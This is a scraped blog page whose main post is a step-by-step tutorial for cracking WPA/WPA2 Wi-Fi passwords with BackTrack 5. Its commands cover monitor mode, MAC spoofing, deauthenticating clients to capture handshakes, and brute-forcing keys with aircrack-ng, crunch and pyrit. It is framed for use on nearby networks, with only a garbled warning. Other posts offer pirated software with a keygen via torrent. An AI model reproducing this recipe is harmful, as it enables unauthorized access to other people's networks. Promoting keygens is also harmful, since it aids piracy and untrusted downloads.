Determination of Surface Tension by Drop Count Method (with Calculation and Explanation in Urdu)
Thursday, 9 December 2021 | comments (1)
1st Year Notes (Long, Short, MCQs) all Chapters
Wednesday, 8 December 2021 | comments
1st Year Chemistry Notes (Long, Short, MCQs) all Chapters
1st Year Physics Notes (Long, Short, MCQs) all Chapters
1st Year Biology Notes (Long, Short, MCQs) all Chapters
2nd Year Notes (Long, Short, MCQs) all Chapters
| comments
2nd Year Chemistry Notes (Long, Short, MCQs) all Chapters
2nd Year Physics Notes (Long, Short, MCQs) all Chapters
2nd Year Biology Notes (Long, Short, MCQs) all Chapters
Online Chemistry Calculators
E-BooksTuesday, 3 November 2020 | comments
Hack Wifi (WPA, WPA 2) with Back Track 5
Tuesday, 4 March 2014 | comments (1)
WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.
certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!
Rules to Follow
certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!
- Download VMware Workstation here: http://www.softpedia.com/get/System/OS-Enhancements/VMware-Workstation.shtml
- Create a new virtual machine like i have created...!!!
- press enter......go on
- At BOOT Menu....just type startx
- an Now your all set to go...just simply follow below steps...now
Rules to Follow
- A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
- here a link to download it http://www.backtrack-linux.org/downloads
- I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... /
- A nearby WEP-enabled Wi-Fi network
- Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.
Step 1 :
The result will be something like :
Step 2 :
Step 3 (Optional) :
Change the mac address of the mon0 interface.
Step 4 :
Then, press "
Step 5 :
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
Download crunch 3.0 (the current version at the time of this writing).
*where
(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
The result will be something like :
Step b :
Step c (Optional) :
Change the mac address of the mon0 interface.
Step d :
Then, press "
Step e :
Step f :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
Step h :
Go to the official site of crunch.
Download
Step i :
Go to the official site of pyrit.
Download
Step j :
*where
Step k (Optional) :
If you encounter error when reading the
*where
Step l :
Then, you will see something similar to the following.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :
Open another terminal.
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step 2 :
airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step b :
airmon-ng start wlan0
Step c (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h :
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download
crunch 3.0
(the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :
Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list
Download
pyrit
and cpyrit-cuda
(the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step k (Optional) :
If you encounter error when reading the
wpacrack-01.cap
, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step l :
Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :
That's all! See you. THANK YOU..!! (HashZone)
pyrit list_cores
That's all! See you. THANK YOU..!! (HashZone)
Sony Movie Studio Platinum 12.0.576 Multilingual + Keygen + Reg Software Information:
SoftwaresSaturday, 29 December 2012 | comments (1)
Make Hollywood movies faster and easier. Import and edit HD and stereoscopic 3D files, use compositing and color-correction tools, apply 5.1 surround sound mixing, and more. Deliver your movies any way you want. Upload them to YouTube and Pixelcast, burn them to Blu-ray Disc, or author DVDs with custom menus and graphics. With its inviting interface, intuitive workflow, and impressive editing tools, Movie Studio Platinum puts professional grade moviemaking right at your fingertips.
Capture the action:
You've shot video on your Bloggie, Handycam, GoPro, and phone, and now you want to bring all the clips together and make a movie. Easy! Import multiple file types into Movie Studio Platinum and edit them on the same timeline. Sort the imported clips to decide which work best in your project.
New ways to share:
Publish movies to Pixelcast without ever leaving the application! Construct a video or slideshow of your vacation, a family event, or a get together with friends. Then send a link to others to check out your experience or invite them to collaborate by uploading photos and video of their own.
Easy project creation:
Start your project out right. Use the New Project dialog to ensure that each project is set up with the exact settings you need to produce stunning movies, every time. Select the option that best matches your video (AVCHD, Blu-ray Disc™, stereoscopic 3D, and more) and Movie Studio sets your Project Properties for you.
Sounds and titles:
Round out your movie with exciting soundtracks and beautiful titles. Import your own music from CD or MP3, record instruments directly into the program, or select from the 20 included Sony Sound Series: Production Music audio files to create the perfect music bed. Animate text in your movies with the Titles & Text tool or create 3D titles with NewBlue Titler EX. The choice is yours!
Up the excitement:
Boost colors, apply slow motion, or add other effects to enhance any video project. Add effects to an entire track or to individual events, and view your changes instantly in the Preview Window.
Transitions and dissolves:
From standard dissolves to sensational 3D, add artistic style between scenes with video transitions. Change the duration of each transition with a simple drag of the video or audio event.
Build something great:
Add up to 20 video and 20 audio tracks to each Movie Studio Platinum project. Create a movie with multiple video layers for compositing or picture-in-picture-style scenes. You can also record multitrack audio directly into the program to create the perfect atmospheric soundtrack.
Note:
Step 1: Please use 7Zip/WinRAR/Universal Extractor to EXTRACT FILES.
Step 2: run the setup
Step 3: Use the key generator to generate a valid serial.
Step 4: This is Torrent File You must be Install U-Torrent First than Use this File & Enjoy... :)
Download Here
ImTOO Video Converter Ultimate 7 Free Download with Key Full Version
Softwares| comments
Key Features
Newly support iPad and Google Android phones: Nexus One, HTC Hero, HTC G2 Magic, HTC Tattoo, Motorola Droid, Motorola CLIQ, Samsung i7500 Support video format taken from all kind of DVs. With simple video editor, can process cutting, division and combination easily. Allows you to transfer the converted files to iPod, iPhone 4/iPhone 4S, iPad or PSP directly after conversion.
Add multiple audio tracks and subtitle files (ASS, SSA and SRT) to enrich your videos. Crop the image frame of your video to retain what you want. Adjust the brightness/saturation/contrast of your videos, and add artistic effects like "Old Film", "Gray", "Line Drawing", etc. Insert video/picture/text watermarks to your videos to mark them as your own. Preview a video with different effects applied or compare the original video with the edited version in real-time. Comes with optimized conversion profiles classified by device type so you can easily find the most suitable conversion solution for your device.
Run the application in the background to free up CPU resources for running other applications. Preset a post conversion action and the application will automatically perform the desired action after completing a task: shut down, hibernation, stand by; exit application Rename files in batches; view file properties; automatic software update checking; multiple language interfaces and skins to choose from.
Convert video and audio for multimedia devices:
iPad, iPod, iPhone, Apple TV, Xbox 360, PSP
PS3, NDS, Wii, BlackBerry, iRiver, Creative Zen
Convert between AVI, MPEG, WMV, DivX, MP4,
MPEG-4 AVC, RM, MOV, MKV, 3GP, FLV, etc.
High-Definition (HD) video encoding and decoding.
Convert 2D videos to 3D videos automatically.
Extract audio from video: MP3, WMA, WAV, RA,
M4A. Convert between various audio formats.
Extract pictures and create video from pictures.
Merge videos/pictures with fun transitions, or clip videos to convert desired part.
Multiple video effects provided for personalization.
System Requirements:
System: Pentium 4 CPU 1.4 GHz
RAM: 512 MB
OS: Windows XP, Vista,7 and Windows 8